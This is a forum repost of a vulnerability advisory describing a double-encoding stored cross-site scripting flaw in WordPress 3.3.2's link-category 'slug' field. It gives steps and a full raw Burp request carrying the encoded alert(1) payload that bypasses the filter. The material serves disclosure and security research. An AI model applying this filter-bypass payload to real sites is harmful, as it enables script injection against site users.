Jump to content
Nytro

WordPress 3.3.2 Cross Site Scripting

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

WordPress 3.3.2 Cross Site Scripting

Authored by old man

WordPress version 3.3.2 suffers from double-encoding cross site scripting vulnerability that bypasses the filter for protection.

There is a persistent XSS vulnerability in the wordpress version 3.3.2.
However, the severity of this finding is very LOW. The detail is as follow,

a) Login into an admin account
B) Navigate to Links -> Links Categories
c) Fill up the required details and intercept the request with a BURP
suite.
d) The injectable parameter is slug. If you inject
<script>alert(1)</script> as a value to parameter "slug", the application
strips it off and the value becomes alert1. But if the payload is double
encode then ;-)
<script>alert(1)</script> when converted to
%253cscript%253ealert%25281%2529%253c%252fscript%253e bypasses xss
protection. The following request shows the raw burp request along with the
vulnerable parameter and payload marked in bold.

BURP REQUEST

POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://localhost/wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b;
wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb
Content-Type: application/x-www-form-urlencoded
Content-Length: 379


action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update

Sursa: WordPress 3.3.2 Cross Site Scripting ? Packet Storm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...